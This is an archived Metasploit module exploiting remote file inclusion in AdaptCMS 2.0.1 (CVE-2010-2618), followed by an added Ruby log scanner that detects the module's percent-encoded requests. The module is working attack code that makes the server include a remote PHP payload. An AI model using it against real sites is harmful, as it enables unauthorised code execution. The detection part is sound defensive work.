AdaptCMS 2.0.1 Beta Release Remote File Inclusion Vulnerability (msf)
Source: http://www.metasploit.com Author: v3n0m Published: 2010-10-13

##
#      )   )            )                     (   (         (   (    (       )     )
#  ( /(( /( (       ( /(  (       (    (     )\ ))\ )      )\ ))\ ) )\ ) ( /(  ( /(
#  )\())\()))\ )    )\()) )\      )\   )\   (()/(()/(  (  (()/(()/((()/( )\()) )\())
# ((_)((_)\(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )\  /(_))(_))/(_))(_)\|((_)\
#__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))  _((_)_ ((_)
#\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \|   \| __| _ \ |  |_ _|| \| | |/ /
# \ V / (_) || (_ |\ V / / _ \  | (__ / _ \ |   /| |) | _||   / |__ | | | .` | ' < 
#  |_| \___/  \___| |_| /_/ \_\  \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
#          .WEB.ID
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = ExcellentRanking

 include Msf::Exploit::Remote::Tcp
 include Msf::Exploit::Remote::HttpClient
 include Msf::Exploit::Remote::HttpServer::PHPInclude

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'AdaptCMS 2.0.1 Beta Released Remote File Inclusion Exploit',
   'Description'    => %q{
     This module can be used to exploit Remote File Inclusion in AdaptCMS 2.0.1 or earlier in file /inc/smarty/libs/init.php.

   },
   'Author'         => [ 'v3n0m' , 'Yogyacarderlink-Indonesia' ],
   'License'        => MSF_LICENSE,
   'Version'        => '$Revision:$',
   'References'     =>     
    [
     [ 'CVE', '2010-2618' ],
     [ 'BID', '41116' ],
    ],
   'Privileged'     => false,
   'Payload'        =>
    {
     'DisableNops' => true,
     'Compat'      =>
      {
       'ConnectionType' => 'find',
      },
     'Space'       => 262144, # 256k
    },
   'Platform'       => 'php',
   'Arch'           => ARCH_PHP,
   'Targets'        => [[ 'Automatic', { }]],
   'DisclosureDate' => 'Oct 12 2010',
   'DefaultTarget' => 0))

  register_options([
   OptString.new('PHPURI', [ true , "The URI to request, with the include parameter changed to !URL!", '/inc/smarty/libs/init.php?sitepath=!URL!']),
   ], self.class)
 end

 def php_exploit

  timeout = 0.01
  uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%"))
  print_status("Trying uri #{uri}")

  response = send_request_raw( {
    'global' => true,
    'uri' => uri,
   },timeout)

  if response and response.code != 200
   print_error("Server returned non-200 status code (#{response.code})")
  end
  
  handler
 end

end
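
For defenders, an added example (not part of the original module or of Metasploit): because the module percent-encodes every byte of the include URL via `Rex::Text.to_hex(php_include_url, "%")`, a plain search for `http://` in access logs misses the request, so this sketch decodes the `sitepath` parameter before matching. The combined log format, the helper names `decode_fully` and `rfi_attempt`, the scheme list and all sample lines are assumptions constructed for illustration.

```ruby
require 'uri'

# Path and parameter come from the module's PHPURI default shown above.
TARGET_PATH  = '/inc/smarty/libs/init.php'
TARGET_PARAM = 'sitepath'
# Assumed list of URL wrappers worth flagging in an include path.
REMOTE_SCHEME = %r{\A\s*(?:(?:https?|ftps?|php|expect)://|data:)}i

# Undo up to `rounds` layers of percent-encoding; stop early on malformed input.
def decode_fully(value, rounds = 3)
  rounds.times do
    decoded = URI.decode_www_form_component(value)
    break if decoded == value
    value = decoded
  end
  value.scrub
rescue ArgumentError
  value.scrub # malformed escape: keep what was decoded so far
end

# Returns the decoded sitepath value if the log line is an inclusion attempt, else nil.
def rfi_attempt(log_line)
  request = log_line[%r{"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"}, 1]
  return nil unless request
  path, query = request.split('?', 2)
  return nil unless decode_fully(path).squeeze('/').end_with?(TARGET_PATH)
  query.to_s.split('&').each do |pair|
    key, raw = pair.split('=', 2)
    value = decode_fully(raw.to_s)
    return value if decode_fully(key.to_s) == TARGET_PARAM && value.match?(REMOTE_SCHEME)
  end
  nil
end

# Constructed sample data (documentation addresses and hostnames, not real traffic).
pct  = ->(s) { s.bytes.map { |b| format('%%%02x', b) }.join } # every byte as %xx
url  = 'http://files.example.test/a'
line = ->(req) { %(203.0.113.7 - - [13/Oct/2010:10:00:00 +0000] "GET #{req} HTTP/1.1" 200 0) }
SAMPLE_LOG = [
  line.call("#{TARGET_PATH}?sitepath=#{url}"),                # plain URL
  line.call("#{TARGET_PATH}?sitepath=#{pct[url]}"),           # encoded once
  line.call("/cms#{TARGET_PATH}?sitepath=#{pct[pct[url]]}"),  # encoded twice, sub-directory
  line.call("#{TARGET_PATH}?sitepath=/var/www/adaptcms/"),    # local path, benign
  line.call("/index.php?next=#{url}")                         # other script, ignored
].freeze

SAMPLE_LOG.each do |entry|
  hit = rfi_attempt(entry)
  puts "ALERT sitepath=#{hit.inspect}" if hit
end
```

Hits matter most on hosts where PHP's `allow_url_include` is enabled, which remote inclusion over HTTP requires.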


 